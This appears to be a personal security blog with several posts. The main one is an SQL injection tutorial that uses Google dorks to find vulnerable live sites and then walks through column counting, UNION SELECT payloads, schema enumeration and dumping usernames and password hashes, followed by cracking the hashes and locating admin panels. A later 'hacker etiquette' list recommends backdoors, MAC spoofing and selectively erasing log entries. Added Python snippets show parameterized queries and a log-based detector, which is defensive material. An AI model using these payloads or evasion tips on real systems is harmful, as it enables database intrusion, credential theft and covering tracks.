Dear readers, you have been following me on this blog, which is on * I am freaking happy to announce that I have transferred all the blog posts to a new domain and new hosting of my own. Please visit from now on. Thanks, all!

Big time!!! It has been a long time since I posted on this blog. This post should be more interesting than the usual ones and helps you bring out the hacker inside you 😉 The topic is SQL injection, commonly known as SQLi. Here I demonstrate SQLi, which is one of the top 10 vulnerabilities listed by OWASP (Open Web Application Security Project); it is not just one of the top 10 but also among the oldest, and it has been at the top of the list for many years.

This blog, no, I can say tutorial! This tutorial gives you an idea of how to get into any database that has an SQL injection vulnerability. So let’s go ahead with the basics.

What is SQL?
SQL (or Structured Query Language) is a special-purpose programming language designed for managing data held in a relational database management system (RDBMS).

What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability in an application’s software. The vulnerability occurs when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is therefore unexpectedly executed.
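The two causes named above (unfiltered input pasted into the statement, and input that is not strongly typed) are shown here beside the hardened form. This is an added example, not code from the original post; it uses Python's sqlite3 in place of PHP/MySQL, and the three-column products table, the sample rows and the function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data. Table and column names follow the tutorial's
    # example schema, cut down to three product columns for brevity.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id_products INTEGER PRIMARY KEY,
                               products_name TEXT, products_price REAL);
        CREATE TABLE user (user_name TEXT, user_pw TEXT);
        INSERT INTO products VALUES (837, 'Sample product', 9.99);
        INSERT INTO user VALUES ('admin', 'constructed-hash-value');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so the database parses whatever the client sent as SQL.
    sql = ("SELECT id_products, products_name, products_price "
           "FROM products WHERE id_products = " + raw_id)
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Strong typing: the id must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None  # caller should answer 400 without touching the database
    # 2) Parameter binding: the value travels separately from the SQL text.
    sql = ("SELECT id_products, products_name, products_price "
           "FROM products WHERE id_products = ?")
    return db.execute(sql, (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    union_input = "-837 union all select 1, user_name, user_pw from user--"
    results = {
        "vulnerable_normal": lookup_vulnerable(db, "837"),
        "vulnerable_union": lookup_vulnerable(db, union_input),
        "hardened_normal": lookup_hardened(db, "837"),
        "hardened_union": lookup_hardened(db, union_input),
        "hardened_quote": lookup_hardened(db, "837'"),
    }
    try:
        lookup_vulnerable(db, "837'")
        results["vulnerable_quote"] = "no error"
    except sqlite3.OperationalError as exc:
        # Same symptom as the MySQL syntax error quoted in the tutorial.
        results["vulnerable_quote"] = "syntax error: " + str(exc)
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

With binding in place the quote and union inputs never reach the SQL parser, so the error-message and column-counting behaviour the tutorial relies on does not occur.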
To start with this exploitation we can use Google, through Google Dorks, to find sites that may be running a vulnerable application.

What are Google Dorks?
Google dorks, or Google operators, are the center of attraction for Google hacking; they help in extracting the required information from Google. Many hackers use Google to find vulnerable web pages and later use these vulnerabilities for hacking. You can get a list of Google Dorks here

Using Google Dorks:

But for now the only Google dorks we will be using to extract the required information are:

  • inurl:index.php?id=
  • inurl:page.php?id=
  • inurl:prod_detail.php?id=

These will list all websites containing "prod_detail.php?id=" in the URL (depending on the dork we are using).

Now enter that into Google and start opening web pages. Finding SQLi vulnerabilities in websites is very simple. You can simply add a single ' or a " at the end of the URL.


If the website is vulnerable it will produce an error which is similar to the following:

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

If you see this, it means you have found a SQL injection vulnerability in the website. For security purposes, let’s use “example” as the domain for this tutorial:

Exploiting the vulnerability

SQL Injection Error Message
This shows that the website is vulnerable to SQL injection.

Step 1: Finding how many columns the site has

To do this we use an ORDER BY clause to find how many columns the query has: order by 100--

We will most likely get an error saying,

Query failed: 1054 - Unknown column '100' in 'order clause'
Select products_model, products_name, products_short, products_image, products_price, products_status, products_describe, categories_name, manufacturers_name from products join manufacturers on (fi_manufacturers = id_manufacturers) join categories on (fi_categories = id_categories) where id_products = 837 order by 100--

SQL Injection Error on Columns
That means the number is too high, so we will lower it: order by 10--

If we get an error yet again, the number is still too high; try a lower value. Let’s take 7: order by 7--

The page will most likely load successfully; if not, the site may not be fully vulnerable to SQL injection. If it loads successfully, increase the number again. Once you get to the maximum number where it loads successfully, that is the number of columns the query has. Here in this example it is 9: order by 9--

SQL Injection Order By
Step 2: Finding the vulnerable columns.

To do this we use UNION ALL SELECT, like so: union all select 1,2,3,4,5,6,7,8,9--

With some sites that won’t be enough to find the vulnerable columns; sometimes it needs an extra push, so we need to force the error. Add a - in front of the 837, like this: prod_detail.php?id=-837

The URL should look like: union all select 1,2,3,4,5,6,7,8,9--

SQL Injection Union Select All

Now it will show the vulnerable columns. The vulnerable columns will be numbers that weren’t there before; the page will also look a lot different. In this case columns 1, 2, 3, 7, 8 and 9 are vulnerable.

Step 3: Exploiting vulnerability

Now here comes what people think is the hardest part, but it’s not that hard! Mind it; anything is possible if you love it. Let’s just collect some info about the site, such as the database name, the user name and the version. Remember the vulnerable columns from before? This is where we use them!

In your UNION ALL SELECT statement, replace the vulnerable column numbers with the three bits of info you want [Database(), User(), Version()]: union all select version(),database(),user(),4,5,6,7,8,9--

SQL Injection Command Execution

Where the 1, 2, 3 were on the page before (or whatever vulnerable column numbers you used), the bits of information will now show. On this website, the three pieces of information are:

Database(): web***2
User(): web***u @ localhost
Version(): 5.6.10-log

Great, our first bits of extracted data! We should get some more information. Before we continue, there are some things that you’ll need.

  1. Firefox Browser
  2. HackBar Plugin

Okay, let’s continue. The next step is to list all the tables. We will now use group_concat(table_name) and from information_schema.tables where table_schema=database()--

Don’t worry, it’s simpler than it looks! The URL looks like this: union all select 1,2,3,4,5,6,group_concat(table_name),8,9 from information_schema.tables where table_schema=database()--

Hey Look! Tables 😉

categories, config, contents, counter, manufacturers, news, orders, orders_products, products, user

SQL Injection Tables

Well done, you’ve successfully extracted the table names. But wait, there’s more! Sadly there is no admin table here, though sometimes there is. So let’s go on to explore the user table.

Have you installed that Firefox plug-in yet? Because you are going to need it now.

The next thing you need to do is replace group_concat(table_name) with group_concat(column_name). If you have HackBar installed, press F9, click the SQL drop-down button, go to MySQL, then click MySQL CHAR() and enter the table name.

In this case that is user. Then replace from information_schema.tables where table_schema=database()-- with from information_schema.columns where table_name=MYSQLCHAR

MYSQLCHAR is the code you receive from HackBar; in this case user is encoded as CHAR(117, 115, 101, 114)

The final URL will look like this: union all select 1,2,3,4,5,6,group_concat(column_name),8,9 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)--

Okay, cool, we have the column names now.


SQL Injection Columns

Now our next task is to get the data from these columns. To do this, replace group_concat(column_name) with group_concat(Column_name_2,0x3a,Column_name_3), where Column_name_2 and Column_name_3 are the column names you want to extract data from, such as user_name and user_pw.

Now change from information_schema.columns where table_name=CHAR to from user. If you want to extract data from a different table, change user to the name of that table.

The URL looks like this: union all select 1,2,3,4,5,6,group_concat(user_name,0x3a,user_pw),8,9 from user--

SQL Injection Credentials

We’ve now extracted data! Good Job.

Now we have the user table, which also contains the admin credentials, and we found the username and password of the user. You will usually find MD5-hashed passwords. To decrypt these go to it’s a great site!

You also need to find the admin control panel; try simple URLs like /admin or /login etc., or look on Google for admin page finder tools. Hope this helps you!
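Seen from the server side, Steps 1 to 3 leave a recognisable sequence of requests in the web access log. The following is an added example, not part of the original post: a small detector that decodes each query-string value and labels which stage of the walkthrough it matches. The log lines are constructed, and the stage names and functions are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# One pattern per stage of the walkthrough, matched on decoded parameter values.
STAGES = [
    ("quote_probe", re.compile(r"^\s*-?\d+\s*['\"]\s*$")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum",
     re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I)),
    ("data_dump", re.compile(r"\bgroup_concat\s*\([^)]*0x3a", re.I)),
]
# Common/combined log format: client address first, request line in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')

# Constructed sample log (documentation IP ranges, made-up times and sizes).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Apr/2013:10:00:01 +0000] "GET /prod_detail.php?id=837' HTTP/1.1" 200 512
203.0.113.5 - - [21/Apr/2013:10:00:09 +0000] "GET /prod_detail.php?id=837+order+by+100-- HTTP/1.1" 200 640
203.0.113.5 - - [21/Apr/2013:10:00:30 +0000] "GET /prod_detail.php?id=-837+union+all+select+1,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 900
203.0.113.5 - - [21/Apr/2013:10:01:02 +0000] "GET /prod_detail.php?id=-837%20union%20all%20select%201,2,3,4,5,6,group_concat(table_name),8,9%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 1200
203.0.113.5 - - [21/Apr/2013:10:02:11 +0000] "GET /prod_detail.php?id=-837+union+all+select+1,2,3,4,5,6,group_concat(user_name,0x3a,user_pw),8,9+from+user-- HTTP/1.1" 200 1500
198.51.100.7 - - [21/Apr/2013:10:02:40 +0000] "GET /prod_detail.php?id=837 HTTP/1.1" 200 2048
198.51.100.7 - - [21/Apr/2013:10:03:05 +0000] "GET /search.php?q=union+station+select+menu HTTP/1.1" 200 2048
""".splitlines()

def classify(value):
    """Return the names of all stages whose pattern matches a decoded value."""
    return [name for name, pattern in STAGES if pattern.search(value)]

def scan(lines):
    """Map each client address to the stages it reached, in first-seen order."""
    seen = defaultdict(list)
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qsl percent-decodes values and turns '+' into a space.
        for _, value in parse_qsl(urlsplit(target).query):
            for stage in classify(value):
                if stage not in seen[client]:
                    seen[client].append(stage)
    return dict(seen)

def flag(lines, min_stages=2):
    """Clients that progressed through at least min_stages distinct stages."""
    return sorted(c for c, s in scan(lines).items() if len(s) >= min_stages)

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, " -> ".join(stages))
```

Requiring two or more distinct stages from one client keeps a single stray quote or a search phrase that happens to contain SQL words from raising an alert.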

This blog is purely for educational purposes only. Information posted is not intended to harm anyone or any organization.

If anyone wants to have the document on your local system, download it here.

Sit Down Series – 2

Posted: April 21, 2013 in Hacking
Hi Readers.

Below we have jotted down a few etiquettes of a Hacker and his/her Victim. Hope this helps you if you are/were one among them.

Etiquettes – Victim

  1. It is okay to panic, even hackers get hacked. It can be a learning experience.
  2. Be normal.
  3. Change the password from own/other system.
  4. Clear the temp [TEMP, %TEMP%] folder.
  5. Restart the system.
  6. Report the issue.
  7. Post your queries on forums, find related issues, and maybe you will find a solution [temporary/permanent].
  8. Check your task manager, test your firewall for suspicious/malicious programs and terminate them.
  9. Save the records of the attack, to investigate or report the incident.
  10. Sign off from all logged in sessions.
  11. Try to remember your last login activity.
  12. Have you saved your password on other system?
  13. Did your hacker friend plant this attack?
  14. Have you shared your password with anyone?
  15. Safeguard your other accounts [bank/other] that are linked to the compromised account.
  16. Let your community know that your account has been compromised.
  17. Find measures to safeguard your account.
  18. Write about it, spread the awareness.
  19. Importantly, check if it’s a spoof or a real attack.
  20. Remember humans are the weakest link.

Etiquettes – Hacker

  1. Acquire necessary permission to plant any attack.
  2. Obtain grants, permissions, rights for every action of yours.
  3. Watch every step of yours [must be retrace-able].
  4. Use the rights ethically.
  5. Own responsibility for your actions.

Secure your machine first.

  1. Use Proxy IP addresses.
  2. Create a backdoor which helps you to plant your next attack.
  3. Be anonymous.
  4. Clear the last login activity if you are using the victim’s system to hack his/her own account.
  5. Build layers of security to prevent easy trace backing.
  6. Spoof the Media Access Control address.
  7. Use public cyber space to plant your attack, if you are an amateur 😛
  8. Erase your tracks. (Don’t delete entire logfiles, instead, just remove only the incriminating entries from the file.)

Hackers misusing this information may be a local and/or federal criminal act (crime). This article is intended to be informational and should only be used for ethical and not illegal purposes.

We web security enthusiasts (Santhosh Tuppad, Jyothi R and I) got together to learn and share about Computer and Web Security.

Black and white hat hackers have their own set of ethics. What does your list look like, do share.

Happy reading!

What is hacking?? What is hack?? Who is hacker?

The main intention of this blog is to educate people about hacking. Most of the people I have met have a different and confused idea of what hacking means. The most common answer I heard was “getting the password of a different user, i.e. unauthorized access, or stealing money from others’ accounts”.

This perception of hacking comes from a lack of information or from what people have heard. A similar situation came up in one of the talks on Information Security held at one of the famous engineering colleges in Bangalore by Santhosh Tuppad, who is a security specialist and my Guru. Students showed great interest as the talk was about hacking/security, but initially, when they were asked what hacking is, the answers were again the same old ones. This inspired me to write this blog, so that it helps in understanding more about hacking.

The term hacker was first introduced in the 1960s and was used to describe a programmer or someone who hacked out computer code. Later the term evolved to mean an individual who had an advanced understanding of computers, networking, programming, or hardware, but did not have any malicious intent.

Hacking is the practice of altering or modifying the features of a system or an application in order to accomplish a goal outside the creator’s original design or aim. A person who consistently engages in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Recently, computer hacking has become the most popular form of hacking, mainly in the field of Information Security, but hacking exists in many other forms like cellular hacking, web app hacking, network hacking etc.; it is not limited to these and can be extended to anything in this world. Just because of the great attention given to black hat hackers in the social media, the whole term hacking is often mistaken for any security-related cybercrime. This damages the reputation of all hackers, and is very bad and unfair. The other intention of this blog is to introduce people to the true ethics of hackers, hopefully clearing the blame they are facing now and giving them the social status which they actually deserve.

Crackers!!! Malicious attacks on computer networks are officially known as cracking. Crackers are another set of people who call themselves hackers, but technically speaking they aren’t. These are people who break into computers and phreak the phone system with minimal knowledge of the system or the application, and loudly call themselves hackers. But many journalists and writers have been fooled into using the word hacker to describe crackers.

Hackers solve problems in their own way; they solve problems in a different way. Actually, the way of thinking itself is different, and they believe in freedom and live as they wish to. To be recognized as a hacker, you have to set your own rules and an attitude which suits your identity, and behave as though you have a great attitude and passion for yourself.

Hacktivist!!!! A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. In more extreme cases, hacktivism is used as a tool for cyber terrorism.

The people who actually build web applications are not paying much attention to security. Stakeholders are looking for people who are creative and able to build interesting websites rather than secure websites. They rate security as No. 6 and creativity as No. 1.

Reasons for hacking vary widely, for example:

  • Criminal intent: stealing credit card numbers, harming a competing company, extortion of money by threatening to hack again or reveal sensitive information found on the computer, and other reasons.
  • Ideological reasons: Some hackers would attack sites that go against their worldview: anti-globalists hack sites of large corporations, some groups of Muslim hackers attack Israeli sites from time to time, and sites of racist organizations often come under attack.
  • Personal revenge: Some hackers would use their skills to harm people for real or perceived wrongs, to either ruin their computer or find personal information and make it public.
  • Some hackers simply attack in order to harm. They are angry at the world for something, and hacking is their way to perform vandalism.
  • Some hackers attack to check their skills at computer safety. Sometimes those attacks will cause no harm, and in some cases the hacker will inform the victims of the failure in their defenses.

Well, last but not least, hacking is an art. It won’t happen overnight. Hacking is a game to prove how smart you are. Start by learning a programming language. Depending on what you want to do (Web Hacking or System Hacking)


The experience starts

Posted: March 18, 2013 in Experience

Moolya is one of the craziest companies I have ever seen!!! Yes, that’s true. The journey starts here: I came to know that Moolya was hiring fresh minds. I need to tell you something about Moolya which you may find strange, but it’s true. I wanted to apply, but how would my resume be different? I knew Moolya hires people who think differently and do things differently [THINK OUT OF THE BOX], and of course I’m one among them, so I wanted to send my resume written by my own hand, not typed, and post it to Moolya. But I didn’t have enough time to do this. Now came the question of how to apply... I started searching and exploring more about Moolya, and the first thing I came across was its blogs (1 year celebrations). I was really impressed by them. Then came the curious tester’s blog. I felt amazed reading them. Finally I got the mail id of curioustester Miss Parimala Hariprasad; I sent a mail briefing her about me and mentioned that I was seeking an opportunity. I was eagerly waiting for the response, and to my surprise I got a mail the next morning, i.e. the 26th, asking me to come for an interview the same day. I was so happy that I got an interview call so soon, but I was a bit scared as I was not ready or prepared for the interview. But with great positive energy, I said to myself, “This is your chance, utilize it. If not, you can’t be a Moolyavan”.

It was 11 am when I reached the Moolya office for the interview. My first round of the interview was fantastic, and I was surprised that I had enough knowledge/skill to impress or convince a Moolyavan (Vipin). Programming was my next round. I finished it and was waiting for the results of that round; in the meantime I heard people fighting and complaining like school kids 😀 One person went on like “Pariiiii ask him to give back my note, it’s mine.” :P I was like, WHAT THE HECK!!! These people are crazy, they are having fun like kids. This was the first instance in which I observed the craziest side of a Moolyavan.

And finally the results were out for the programming round, and I had cleared it. Anjali (HR) called me inside for another round of interview. I was shocked as soon as I entered the cabin: 2 people (Pradeep Soundararajan and Sunil Kumar) welcomed me. I was like, GOD, “2 on 1”, that’s ridiculous. But I also said to myself, “You know what you are and you have to prove it to these people”. As soon as I settled, they started with a couple of standard interview questions and my past experience, skills, etc. They were really happy with my responses. Actually they were shocked by my responses, and the final verdict was out and I got the job. 🙂

There were a couple of instances which made me feel wow about Moolya:

  • Employees had come to office in ¾ th pants.
  • Candidates appearing for the interview will be provided with a greeting card for spending their precious time.
  • Moolya treats every employee as a Co-Owner of the company.
  • The foosball table.
  • The party after work.

I joined Moolya on 29th Jan. I was so excited that I reached the office by 8 AM and the office was not yet open 😀 I roamed for a while and came back. My first task was to assemble my system in my cubicle, followed by a session on Software Testing by Master Shifu Parimala. It is the company’s policy to take the newly joined employee out for lunch, so we went out for lunch, and the actual fun started by 4. Everyone was busy working on their projects, and suddenly some people started saying “Chocolate time” and they gathered. I was shocked and was waiting to see what it was. Then I noticed that I was in the middle of the gathering, and I understood it was for an introduction followed by RAGGING :P Yeah, you heard it right: everyone asked me to dance to a song. The worst thing is I don’t know how to dance; I had never tried in my life, but somehow I managed to do it 😀 and it was followed by other stuff on testing.

I have just completed 1 month at Moolya. It has been a great time working at Moolya, with the great pleasure of working differently in all ways, including this blog. I never imagined myself writing a blog, and again it’s through Moolya’s inspiration. I’m really glad to work at Moolya, which makes me feel proud of myself.

It’s exactly one month that I have been working here as a tester. On 26th Feb a mail from Mozilla surprised me and made me go high. And guess what: for the security bug I reported I got a bounty of $500. Yeah, you heard it right, that’s true. A security bug in Mozilla which I reported got me into the “Mozilla Hall Of Fame”, along with a bug bounty, which happened for the first time in my life. Again this credit goes to Moolya, my team and Ravi, who guided me on the right path.

Pari, special thanks to you, without you I wouldn’t have been here. All the credit goes to you. 🙂

Finally, “I am here for a mission. And I want to fulfill it, with all the passion I carry and all the guidance I have. I wish a great journey awaits me with all the great people around me. For the time being this is all I want to share. Stay tuned to know more about my Software testing journey”.